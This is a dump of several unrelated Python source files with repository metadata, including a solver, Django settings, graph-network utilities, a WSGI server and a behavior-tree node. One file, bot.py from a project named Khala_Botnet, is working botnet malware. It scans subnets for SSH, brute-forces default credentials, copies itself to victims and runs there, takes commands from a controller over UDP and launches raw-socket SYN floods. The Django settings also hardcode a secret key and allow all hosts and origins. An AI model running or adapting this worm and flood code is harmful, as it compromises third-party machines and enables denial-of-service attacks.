2017-02-07T14:12:49.000Z
|
2022-03-06T23:09:34.000Z
|
# importing the Kratos Library
import KratosMultiphysics as KM
import KratosMultiphysics.ShallowWaterApplication as SW
## Import base class file
from KratosMultiphysics.ShallowWaterApplication.free_surface_shallow_water_solver import FreeSurfaceShallowWaterSolver
def CreateSolver(model, custom_settings):
return SemiLagrangianShallowWaterSolver(model, custom_settings)
class SemiLagrangianShallowWaterSolver(FreeSurfaceShallowWaterSolver):
def __init__(self, model, settings):
super().__init__(model, settings)
self.min_buffer_size = 2
self.element_name = "LagrangianSWE"
self.condition_name = "LineCondition"
def AddVariables(self):
super().AddVariables()
self.main_model_part.AddNodalSolutionStepVariable(SW.PROJECTED_SCALAR)
def Initialize(self):
super().Initialize()
self.bfecc = SW.BFECCConvectionUtility(self.GetComputingModelPart())
def InitializeSolutionStep(self):
self.bfecc.Convect(KM.MOMENTUM, KM.VELOCITY)
self.bfecc.CopyVariableToPreviousTimeStep(KM.MOMENTUM)
super().InitializeSolutionStep()
| 37.4
| 118
| 0.76738
|
7423c07c59801b0e5e7c9bd7def69adf8c4334e2
| 12,526
|
py
|
Python
|
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
bot.py
|
mhy001/Khala_Botnet
|
0a8fdb2144f78ce91cdd8a354a7e54bc1e16928f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""bot.py
External Dependencies:
nmap for network mapping
paramiko for ssh & sftp
"""
# standard lib
import logging
import os
import random
import socket
import stat
import struct
import subprocess
import sys
import threading
import time
# third-party lib
import nmap
import paramiko
# CONSTANTS
MASTER = '192.168.1.3' # C2 server IPv4 address
PORT = 1337
ID = socket.gethostbyname(socket.gethostname())
BOT_FILE_PATH = '/tmp/bot.py'
DELIMITER = '::'
MAX_THREAD = 100 # must be less than max thread limit
# GLOBALS
state = -1 # 0 ready, 1 attacking, 2 enrolled for attack, 3 stop attacking
credentials = [
('ubuntu', 'ubuntu'),
('pi', 'raspberry'),
('admin', 'password'),
('cpsc', 'cpsc')
]
logging.basicConfig(level=logging.INFO,
format='%(asctime)s PID:%(process)d %(threadName)s %(message)s',
datefmt='%H:%M:%S',
filename='/tmp/bot.log')
logger = logging.getLogger('')
##################################################################
# WORM
# A simple ssh worm that:
# 1. Uses nmap to scan the local subnet for IP systems which have
# ssh open on the default port, 22.
# 2. Attempts to gain access by bruteforce with a pre-set list
# of credentials
# 3. If connected, copy self to the victim and begin execution
# on the victim
##################################################################
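# Example flow (assumption: this bot's own address ID is 192.168.1.7):
#   worm_driver('192.168.1.7') scans 192.168.1.7/24 for hosts with port 22
#   open, tries each (username, password) pair from `credentials`, and on
#   success uploads this script to /tmp/bot.py on the victim and runs it.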
def access_system(host):
""" Perform a brute force attack against a host system
@param host: hostname/ip of target system
@return: tuple of instance of paramiko SSH class, successful username,
    successful password; None otherwise
"""
global credentials
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info('Accessing {}'.format(host))
for (username, password) in credentials:
result = try_credentials(host, username, password, ssh)
if result == 0:
return (ssh, username, password)
logger.info('Could not access {}'.format(host))
return None
def get_targets(subnet):
""" Get list of target systems
@param subnet: the target subnet; example '192.168.1.1/24'
@return: list of potential target hosts with default ssh port open, 22
"""
nm = nmap.PortScanner()
hosts = []
nm.scan(subnet, arguments='-p 22 --open')
hosts = nm.all_hosts()
targets = []
for host in hosts:
if nm[host].state() == 'up' and host != MASTER and \
host != ID and not host.startswith('127.'):
targets.append(host)
return targets
def spread(sshclient):
""" Spread to target victim system and start the bot
@param sshclient: instance of paramiko SSH class connected to a system
"""
sftp = sshclient.open_sftp()
sftp.put(os.path.abspath(sys.argv[0]), BOT_FILE_PATH)
sftp.chmod(BOT_FILE_PATH, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)
sftp.close()
sshclient.exec_command('python ' + BOT_FILE_PATH)
#sshclient.exec_command('python3 ' + BOT_FILE_PATH)
def try_credentials(host, username, password, sshclient):
""" Try connecting to a host with a set of credentials
@param host: hostname/ip of target system
@param username: username to try
@param password: password to try
@param sshclient: instance of paramiko SSH class
@return: 0 for success; -1 for socket error;
1 for wrong credentials, maybe
"""
try:
sshclient.connect(host, username=username, password=password)
except paramiko.AuthenticationException:
return 1
except paramiko.SSHException:
return 1
except socket.error:
return -1
return 0
def worm_driver(target):
""" Driver for the worm
@param target: ipv4 address of beginning target
@side-effect: when done, sets bot state to ready
"""
logger.info('LOADING WORM')
global state
state = 1
targets = get_targets(target + '/24')
logger.info('worm targets: {}'.format(targets))
for target in targets:
sshInfo = access_system(target)
if sshInfo:
sftp = sshInfo[0].open_sftp()
try:
sftp.get(BOT_FILE_PATH, '/tmp/' + target + '.txt')
logger.info('{} is a friend'.format(target))
except IOError:
logger.info('Infecting {}'.format(target))
spread(sshInfo[0])
finally:
os.remove('/tmp/' + target + '.txt')
sftp.close()
sshInfo[0].close()
state = 0
logger.info('TERMINATING WORM')
##################################################################
# BOT
# Communication is transmitted via UDP
# Messages accepted from C2 server:
# 'ROLL': roll call to check for bot's state
# 'ATCK': launch an attack; see atck_command for more details
# 'STOP': terminate active attacks
# Messages sent to C2 server:
# 'HELO': tells the C2 server that bot is up
# 'REDY': response to 'ROLL' for bot in ready state
# 'BUSY': response to 'ROLL' for bot not in ready state
# NOTE: raw sockets & scapy module require root privileges
##################################################################
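# Example wire format (addresses are illustrative only), using DELIMITER '::':
#   'ROLL'                  -> bot answers 'REDY' (and enrolls) or 'BUSY'
#   'ATCK::1::192.168.1.50' -> atck_command() starts a SYN flood on 192.168.1.50
#   'ATCK::0::192.168.1.50' -> spread the bot across that target's subnet
#   'STOP'                  -> terminate active attacks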
def atck_command(tokens):
""" Processes an attack message from the C2 server
Attack 0: spread bot
Attack 1: syn flood
NOTE: remember to check for stopping state in the attacks and
to reset to ready state when attack ends
@param tokens: tokenized attack command in the following format:
['ATCK', <int for attack type>, <target IPv4 address>]
@side-effect: sets bot state to attacking
"""
global state
if state != 2: # check for enrolled state
return
try:
atck_type = int(tokens[1])
target = tokens[2]
state = 1
logger.info('Starting attack {} on {}'.format(atck_type, target))
if target == MASTER or target.startswith('127.'):
state = 0
return
if atck_type == 0: # spread the bot, ignores stop command
worm_driver(target)
elif atck_type == 1: # syn flood
syn_flood(target)
except (ValueError, IndexError):
return
def hello():
""" Sends a 'HELO' message to the C2 server every minute
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
sock.sendto('HELO', (MASTER, PORT))
#sock.sendto(bytes('HELO', 'utf-8'), (MASTER, PORT))
time.sleep(60)
sock.close()
def process_commands(message):
""" Processes commands received from the C2 server
@param message: message from the C2 server
"""
tokens = message.split(DELIMITER)
command = tokens[0]
if command == 'ROLL':
roll_command()
elif command == 'ATCK':
atck_command(tokens)
elif command == 'STOP':
stop_command()
else:
return
def roll_command():
""" Sends a 'REDY' message if bot is in ready state, 'BUSY' otherwise
"""
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if state == 0:
state = 2
sock.sendto('REDY', (MASTER, PORT))
#sock.sendto(bytes('REDY', 'utf-8'), (MASTER, PORT))
else:
sock.sendto('BUSY', (MASTER, PORT))
#sock.sendto(bytes('BUSY', 'utf-8'), (MASTER, PORT))
sock.close()
def stop_command():
""" Terminate any active attacks
    @side-effect: sets bot state to ready
"""
global state
state = 3
time.sleep(5) # should be long enough for attack threads to see stop state
state = 0
def syn_flood(target):
""" Perform a syn flood on target system
@param target: IPv4 of system to attack
"""
count = 0
while state == 1 and count < MAX_THREAD:
count = count + 1
threading.Thread(target=tcp_syn, args=(target,)).start()
def bot_driver():
""" Driver for the bot
"""
logger.info('LOADING BOT')
global state
threading.Thread(target=hello).start()
master_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
master_sock.bind(('', PORT))
#state = 0 # don't set bot to ready yet. potential race condition with worm driver
while True:
message = master_sock.recv(1024)
logger.info('Received: {}'.format(message))
threading.Thread(target=process_commands, args=(message,)).start()
master_sock.close()
##################################################################
# SYN FLOOD
##################################################################
def calculate_tcp_checksum(message):
""" Calculate the TCP checksum
@param message: payload + TCP headers + pseudoheader
@return: 16-bit TCP checksum value
"""
    cs = 0
    # sum the message as big-endian 16-bit words (RFC 1071 Internet checksum)
    for i in range(0, len(message), 2):
        w = (ord(message[i]) << 8) + ord(message[i+1])
        cs = cs + w
    # fold carries back into the low 16 bits, then take the one's complement
    cs = (cs >> 16) + (cs & 0xffff)
    cs = cs + (cs >> 16)
    cs = ~cs & 0xffff
    return cs
def create_ip_header(src, dst):
""" Create the IP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: IPv4 header
"""
# IPv4 header fields
v_ihl = 69 # 0x45; version 4, internet header length 5
dscp_ecn = 0 # type of service
total_len = 20 + 20 # length of packet; ip header + tcp header
ident = random.randint(0, 65535) # identification
flag_frag = 0 # flag and fragment offset
ttl = 255 # time to live
protocol = socket.IPPROTO_TCP # protocol; TCP
    checksum = 0 # checksum value; the kernel fills this in when left as 0 with IP_HDRINCL
return struct.pack('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len,
ident, flag_frag, ttl, protocol, checksum, src, dst)
def create_tcp_header(src, dst):
""" Create the TCP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: TCP header
"""
# TCP header fields
src_port = 8008 #random.randint(1024, 65535) # source port, non-privileged
dest_port = 80 # destination port; http
seq = 0 # sequence number
ack = 0 # acknowledgement number
offset_reserved = 0x50 # data offset and reserved
flags = 2 # TCP flags; SYN flag = 1
window = socket.htons(5840) # window size
checksum = 0 # checksum value
urg = 0 # urgent pointer
temp = struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
    # Pseudo header fields
protocol = socket.IPPROTO_TCP # protocol; TCP
tcp_len = len(temp) # length of tcp header + payload
psh = struct.pack('!4s4sHH', src, dst, protocol, tcp_len)
checksum = calculate_tcp_checksum(psh + temp)
return struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
def create_tcp_syn_packet(target):
""" Create the TCP SYN packet
@param target: IPv4 address
@return: TCP SYN packet
"""
'''
a = random.randint(1,255)
b = random.randint(1,255)
c = random.randint(1,255)
d = random.randint(1,255)
src_ip = '{}.{}.{}.{}'.format(a, b, c, d) # spoofed ip
'''
src_ip = ID
src = socket.inet_aton(src_ip) # source IP address
dst = socket.inet_aton(target) # destination IP address
packet = create_ip_header(src, dst) + create_tcp_header(src, dst)
return packet
def tcp_syn(target):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
while state == 1:
packet = create_tcp_syn_packet(target)
for _ in xrange(100):
if state != 1:
break
            sock.sendto(packet, (target, 0))
sock.close()
except: # no root privilege
while state == 1:
os.system('nc ' + target + ' 80')
##################################################################
# MAIN DRIVER
# Starts the worm driver and the bot driver
##################################################################
def main():
""" Main driver for the bot
"""
global ID
if ID.startswith('127.'): # maybe in a VM environment
try:
import netinfo
ID = netinfo.get_ip('enp0s3')
except:
pass
threading.Thread(target=bot_driver).start()
threading.Thread(target=worm_driver, args=(ID,)).start()
if __name__ == '__main__':
main()
| 30.256039
| 86
| 0.602746
|
f57b040b472b60ab908a5638c41b7493ef8f6be8
| 5,003
|
py
|
Python
|
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | 1
|
2019-12-16T19:56:30.000Z
|
2019-12-16T19:56:30.000Z
|
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | null | null | null |
jango/jango/settings.py
|
seemamir/django
|
e5eaf65de7e2603761624d48ab549de929d923cd
|
[
"MIT"
] | null | null | null |
"""
Django settings for jango project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SETTINGS_PATH = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'wfpqb6_tk479d@uf@#()n^%$zfr-sl&3t9eal@6kj)*qzdp0@5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
CORS_ORIGIN_ALLOW_ALL = True
CORS_ORIGIN_WHITELIST = (
'localhost:3000',
'localhost:8080',
'localhost:4000'
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
'api',
'djoser',
'rest_framework.authtoken',
'rest_framework',
'django.contrib.auth',
'django.contrib.messages',
'django.contrib.sites',
'rest_framework_swagger',
'allauth',
'rest_auth',
'django_filters',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.twitter',
'allauth.account',
'allauth.socialaccount',
'rest_auth.registration',
'django.contrib.admin',
'corsheaders'
]
SITE_ID = 1
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(SETTINGS_PATH, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
],
},
},
]
WSGI_APPLICATION = 'jango.wsgi.application'
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
# 'DEFAULT_PERMISSION_CLASSES': [
# 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
# 'rest_framework.authentication.SessionAuthentication',
# 'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
),
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
PASSWORD_RESET_CONFIRM_URL = "http://localhost:3000/reset-url/"
REST_SESSION_LOGIN = False
AUTHENTICATION_BACKENDS = (
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
)
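# NOTE: this second AUTHENTICATION_BACKENDS assignment overrides the one defined
# earlier in this file, so only the allauth backend is active; re-add
# 'django.contrib.auth.backends.ModelBackend' here if Django's default
# username/password authentication is still required.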
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| 27.489011
| 91
| 0.705577
|
c05ae0d418634865408acb4d9fef7ce79782af49
| 5,202
|
py
|
Python
|
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | 3
|
2018-04-26T06:44:27.000Z
|
2018-09-01T13:58:21.000Z
|
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | null | null | null |
resGCN/src/utils.py
|
CEfanmin/DataMiningProjects
|
b6375f542c68c0001ae2971dd7e8046a0b4afc7a
|
[
"MIT"
] | 1
|
2018-09-01T13:58:27.000Z
|
2018-09-01T13:58:27.000Z
|
import networkx as nx
import numpy as np
import sys
import pickle as pkl
import scipy.sparse as sp
def parse_index_file(filename):
index = []
for line in open(filename):
index.append(int(line.strip()))
return index
def sample_mask(idx, l):
mask = np.zeros(l)
mask[idx] = 1
    return np.array(mask, dtype=bool)  # np.bool is a deprecated alias of the builtin bool
def load_data(dataset):
"""
loads input data from data files
ind.dataset_str.x => the feature vectors of the training instances as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.tx => the feature vectors of the test instances as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.allx => the feature vectors of both labeled and unlabeled training instances
(a superset of ind.dataset_str.x) as scipy.sparse.csr.csr_matrix object;
ind.dataset_str.y => the one-hot labels of the labeled training instances as numpy.ndarray object;
ind.dataset_str.ty => the one-hot labels of the test instances as numpy.ndarray object;
ind.dataset_str.ally => the labels for instances in ind.dataset_str.allx as numpy.ndarray object;
ind.dataset_str.graph => a dict in the format {index: [index_of_neighbor_nodes]} as collections.defaultdict
object;
ind.dataset_str.test.index => the indices of test instances in graph, for the inductive setting as list object.
all objects above must be saved using python pickle module.
    :param dataset: Dataset name
:return: All data input files loaded (as well the training/test data)
"""
names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']
objects = []
for i in range(len(names)):
with open("../data/ind.{}.{}".format(dataset, names[i]), 'rb') as f:
if sys.version_info > (3, 0):
objects.append(pkl.load(f, encoding = 'latin1'))
else:
objects.append(pkl.load(f))
x, y, tx, ty, allx, ally, graph = tuple(objects)
test_idx_reorder = parse_index_file("../data/ind.{}.test.index".format(dataset))
test_idx_range = np.sort(test_idx_reorder)
features = sp.vstack((allx, tx)).tolil()
features[test_idx_reorder,:] = features[test_idx_range, :]
adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))
laplacian = nx.laplacian_matrix(nx.from_dict_of_lists(graph))
labels = np.vstack((ally, ty))
labels[test_idx_reorder, :] = labels[test_idx_range, :]
idx_train = range(len(y))
idx_val = range(len(y), len(y)+500)
idx_test = test_idx_range.tolist()
train_mask = sample_mask(idx_train, labels.shape[0])
val_mask = sample_mask(idx_val, labels.shape[0])
test_mask = sample_mask(idx_test, labels.shape[0])
y_train = np.zeros(labels.shape)
y_val = np.zeros(labels.shape)
y_test = np.zeros(labels.shape)
y_train[train_mask, :] = labels[train_mask, :]
y_val[val_mask, :] = labels[val_mask, :]
y_test[test_mask, :] = labels[test_mask, :]
return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, laplacian
def sparse_to_tuple(sparse_mx):
"""
Convert sparse matrix to tuple representation
"""
def to_tuple(mx):
if not sp.isspmatrix_coo(mx):
mx = mx.tocoo()
coords = np.vstack((mx.row, mx.col)).transpose()
values = mx.data
shape = mx.shape
return coords, values, shape
if isinstance(sparse_mx, list):
for i in range(len(sparse_mx)):
sparse_mx[i] = to_tuple(sparse_mx[i])
else:
sparse_mx = to_tuple(sparse_mx)
return sparse_mx
def preprocess_features(features):
"""
Row-normalize feature matrix and convert to tuple representation
"""
rowsum = np.array(features.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
features = r_mat_inv.dot(features)
return sparse_to_tuple(features)
def normalize_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
def preprocess_adj(adj):
"""
Preprocessing of adjacency matrix for simple GCN model
and conversion to tuple representation
"""
adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))
return sparse_to_tuple(adj_normalized)
def preprocess_lap(lap):
"""
Preprocessing of laplacian matrix for simple resGCN model
and conversion to tuple representation
"""
return sparse_to_tuple(lap)
def construct_feed_dict(features, support, labels, labels_mask, placeholders):
"""Construct feed dictionary."""
feed_dict = dict()
feed_dict.update({placeholders['labels']: labels})
feed_dict.update({placeholders['labels_mask']: labels_mask})
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})
feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})
return feed_dict
| 36.893617
| 115
| 0.680892
|
6f0db0e712efe580d05f6b9459eaccf9e965c7b8
| 1,739
|
py
|
Python
|
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
Servers/simple_multithreaded_wsgi.py
|
kevinlee05/python-snippets
|
359b127f2e55113a628503d1ff69ba1cfac1f77d
|
[
"MIT"
] | null | null | null |
'''WSGI-compliant HTTP server. Dispatches requests to a pool of threads.'''
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
import multiprocessing.pool
__all__ = ['ThreadPoolWSGIServer', 'make_server']
class ThreadPoolWSGIServer(WSGIServer):
'''WSGI-compliant HTTP server. Dispatches requests to a pool of threads.'''
def __init__(self, thread_count=None, *args, **kwargs):
'''If 'thread_count' == None, we'll use multiprocessing.cpu_count() threads.'''
WSGIServer.__init__(self, *args, **kwargs)
self.thread_count = thread_count
self.pool = multiprocessing.pool.ThreadPool(self.thread_count)
# Inspired by SocketServer.ThreadingMixIn.
def process_request_thread(self, request, client_address):
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
self.pool.apply_async(self.process_request_thread, args=(request, client_address))
def make_server(host, port, app, thread_count=None, handler_class=WSGIRequestHandler):
'''Create a new WSGI server listening on `host` and `port` for `app`'''
httpd = ThreadPoolWSGIServer(thread_count, (host, port), handler_class)
httpd.set_app(app)
return httpd
if __name__ == '__main__':
from wsgiref.simple_server import demo_app
httpd = make_server('', 8000, demo_app)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
import webbrowser
webbrowser.open('http://localhost:8000/xyz?abc')
httpd.serve_forever()
| 37
| 90
| 0.706728
|
288b35934cb015d6d863330dc5aba6502d49fd2b
| 6,178
|
py
|
Python
|
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | 2
|
2020-12-02T22:56:45.000Z
|
2021-01-14T21:22:55.000Z
|
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | null | null | null |
b3/core/basenode.py
|
collaborative-robotics/behavior3py
|
d65ec781a1fefde7ad8f6c4369833054da312a7e
|
[
"MIT"
] | 1
|
2020-12-02T22:56:49.000Z
|
2020-12-02T22:56:49.000Z
|
import b3
import uuid
__all__ = ['BaseNode']
class BaseNode(object):
category = None
title = None
description = None
def __init__(self):
self.id = str(uuid.uuid1())
self.title = self.title or self.__class__.__name__
self.description = self.description or ''
self.parameters = {}
self.properties = {}
# data for learning/adaptation of BTs
self.Name = "--unnamed--"
self.BHdebug = 0
self.N_ticks = 0 # number of ticks of this node
self.N_success = 0 # number of success returns
self.state = 0 # a variable on which to condition success probs.
self.N_tik2 = [0, 0, 0, 0] # number of ticks on each state
self.N_suc2 = [0, 0, 0, 0] # prob success conditioned on state
self.Ps = 0.0 # P(success) (fixed param used with stochastic success simulations)
self.P_selector = 0.0 # probability selected by selector S02
self.Cost = 0 # Cost of ticking this leaf (INT!)
self.Utility = 0.0 # U = P/C
self.Utility_Mode = "RATIO"
self.suc = 0
self.fail = 0
# BH estimate local success probability
def prob(self):
if self.N_ticks > 0:
# empirical success prob.
empPs = float(self.N_success) / float(self.N_ticks)
#print "P(s) = ", empPs
return empPs
else:
return 0.1
# BH get Utility for this node
def get_Utility(self):
if(self.Utility_Mode == "RATIO"):
if(self.Cost > 0):
self.Utility = self.prob() / self.Cost
else:
self.Utility = self.prob()
#if(self.BHdebug == 1):
#print self.Name + '.get_Utility(): Cost: ' + str(self.Cost) +' P(S): ' + str(self.Ps) + ' Utility: ' + str(self.Utility)
if(self.Utility_Mode == "NEG_COST"):
self.Utility = self.prob() * (-1) * self.Cost
return self.Utility
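    # Worked example (illustrative numbers only): with N_success=3, N_ticks=4
    # and Cost=2, prob() is 0.75, so "RATIO" mode gives Utility = 0.75 / 2 = 0.375
    # while "NEG_COST" mode gives Utility = 0.75 * (-1) * 2 = -1.5.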
# BH get Utility for this node CONDITIONED on STATE
def get_Utility2(self): # for now use on Leafs only
if(self.Utility_Mode == "RATIO"):
if(self.Cost > 0):
self.Utility = self.prob_state()[self.state] / self.Cost
else:
self.Utility = self.prob_state()[self.state]
#if(self.BHdebug == 1):
#print self.Name + '.get_Utility(): Cost: ' + str(self.Cost) +' P(S): ' + str(self.Ps) + ' Utility: ' + str(self.Utility)
if(self.Utility_Mode == "NEG_COST"):
self.Utility = self.prob_state()[self.state] * (-1) * self.Cost
return self.Utility
# BH
def get_state(self, bb): # update your own state -- need to overlay this
print self.Name , ": trying to update external sensing state -- not yet defined"
quit()
# BH estimate local success probability
def prob_state(self):
p = [0.0,0.0,0.0,0.0]
for i in range(0,len(p)):
if self.N_tik2[i] > 0:
p[i] = float(self.N_suc2[i]) / float(self.N_tik2[i])
else:
p[i] = 0.5
if(0):
s = "{:4.2} {:4.2} {:4.2} {:4.2} ".format(p[0],p[1],p[2],p[3])
print self.Name,"prob_state(): ",s
s = "{:4} {:4} {:4} {:4} ".format(self.N_suc2[0],self.N_suc2[1],self.N_suc2[2],self.N_suc2[3])
print self.Name,"N Success: ",s
s = "{:4} {:4} {:4} {:4} ".format(self.N_tik2[0],self.N_tik2[1],self.N_tik2[2],self.N_tik2[3])
print self.Name,"N tik2: ",s
#print self.Name, p
return p
# BH reset the probability counters
def p_reset(self):
self.N_ticks = 0
self.N_success = 0
self.N_tik2 = [0.0,0.0,0.0,0.0]
self.N_suc2 = [0.0,0.0,0.0,0.0]
# report your stats
def report_stats(self):
print '\n\n',self.Name,' Statistics'
print 'N_ticks: ',self.N_ticks
print 'N_success: ',self.N_success
print 'prob ',self.prob()
print 'Cost: ',self.Cost
print 'Utility: ',self.get_Utility()
print 'Utilty mode: ',self.Utility_Mode
@property
def name(self):
return self.__class__.__name__
def _execute(self, tick):
self._enter(tick)
if (not tick.blackboard.get('is_open', tick.tree.id, self.id)):
self._open(tick)
#print(self.name, ' _execute()')
status = self._tick(tick)
if (status != b3.RUNNING):
self._close(tick)
self._exit(tick)
return status
def _enter(self, tick):
tick._enter_node(self)
self.enter(tick)
def _open(self, tick):
tick._open_node(self)
tick.blackboard.set('is_open', True, tick.tree.id, self.id)
self.open(tick)
def _tick(self, tick):
tick._tick_node(self)
#BH count the ticks
self.N_ticks += 1
if(self.BHdebug == 1):
print 'basenode: ', self.Name, " ticked "
status = self.tick(tick)
#BH count the total cost
tick.blackboard.inc('TotalCost',self.Cost)
if(self.BHdebug == 1):
if(status == b3.SUCCESS):
print "basenode: ", self.Name, " SUCCESS "
elif(status == b3.FAILURE):
print "basenode: ", self.Name, " FAIL"
# BH keep track of successful ticks
if(status == b3.SUCCESS):
self.N_success += 1
self.N_suc2[self.state] += 1
if(tick.tree.log_flag > 0):
tick.tree.log_file.write('S '+self.Name+'\n')
if(status == b3.FAILURE and tick.tree.log_flag > 1):
tick.tree.log_file.write('F '+self.Name+'\n')
return status
def _close(self, tick):
tick._close_node(self)
tick.blackboard.set('is_open', False, tick.tree.id, self.id)
self.close(tick)
def _exit(self, tick):
tick._exit_node(self)
self.exit(tick)
def enter(self, tick): pass
def open(self, tick): pass
def tick(self, tick): pass
def close(self, tick): pass
def exit(self, tick): pass
| 33.759563
| 143
| 0.541761
|
81deb293078bb71db98183e8abfa53b33dcee6b2
| 130
|
py
|
Python
|
vDjango/sobre/views.py
|
VinicBueno/Django
|
e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
vDjango/sobre/views.py
|
VinicBueno/Django
|
